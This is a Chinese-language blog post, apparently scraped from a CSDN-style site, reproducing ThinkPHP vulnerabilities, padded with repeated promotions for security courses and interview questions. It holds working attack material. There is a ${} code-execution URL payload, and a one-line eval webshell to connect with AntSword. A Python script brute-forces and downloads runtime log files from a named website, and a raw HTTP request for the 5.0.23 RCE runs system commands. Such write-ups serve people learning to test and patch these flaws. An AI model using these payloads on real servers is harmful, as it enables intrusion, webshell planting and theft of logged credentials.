一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
1.2、利用步骤
1、启动docker环境,启动thinkphp环境,没有配置环境的可以看这个链接https://blog.youkuaiyun.com/luluoluoa/article/details/115416478
2、访问ip+端口
提示:这里在PHP中${}里面可以执行函数
ThinkPHP的url规则:
thinkphp 所有的主入口文件默认访问index控制器(模块)
thinkphp 所有的控制器默认执行index动作(方法)
存在漏洞的static public function
dispatch(),叫URL映射控制器,也就是URL访问的路径是映射到哪个控制器下。
3、既然可以执行函数,我们可以构建payload,
http://192.168.190.128:8080/index.php/?s=/Index/index/name/${@phpinfo()}
注意上面的第一个index是模块,第二个index是方法,name是操作名,后面的是操作
4、构建一句话木马,并用蚁剑连接
http://192.168.190.128:8080/index.php/?s=/Index/index/name/${print(@eval($\_POST[hacker]))}
2. ThinkPHP 3.x 日志泄露漏洞
漏洞原因
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
ThinkPHP默认安装后,也会在Runtime目录下生成日志
日志很容易被猜解到,而且日志里面有执行SQL语句的记录
漏洞利用过程
日志存储结构:
项目名\Runtime\Logs\Home\年份_月份_日期.log
THINKPHP3.2 日志结构:Application\Runtime\Logs\Home\16_09_09.log
THINKPHP3.1 日志结构:Runtime\Logs\Home\16_09_09.log
有的时候我们可以在用户登录日志中找到用户名和密码
放个参考链接
https://blog.youkuaiyun.com/weixin_40412037/article/details/113885372
github工具
https://github.com/JaneMandy/ThinkPHP_RCE
这是一款pthinkphp综合漏洞利用工具箱。
也可以用python代码
import requests
import sys
def logfile(year):
logfilename = []
for m in range(1, 13):
for d in range(1, 32):
m = str(m).rjust(2, '0')
d = str(d).rjust(2, '0')
logfilename.append("%s\_%s\_%s.log" % (year, m, d))
return logfilename
def main():
year = sys.argv[1]
print(year)
logfilename = logfile(year)
for logname in logfilename:
url = "http://www.webhack123.com/App/Runtime/Logs/" + logname //这里需要改成你的日志文件
r = requests.get(url)
if r.status_code == 200:
print(url)
with open(logname, "w", encoding="utf-8") as f:
f.write(r.text)
if __name__ == '\_\_main\_\_':
main()
3 ThinkPHP5 5.0.23远程代码执行漏洞
漏洞成因
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞利用过程
md,复现不出来,用工具扫出来了,但是贴一下poc
POST /index.php?s=captcha HTTP/1.1
Host: you_ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.youkuaiyun.com/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
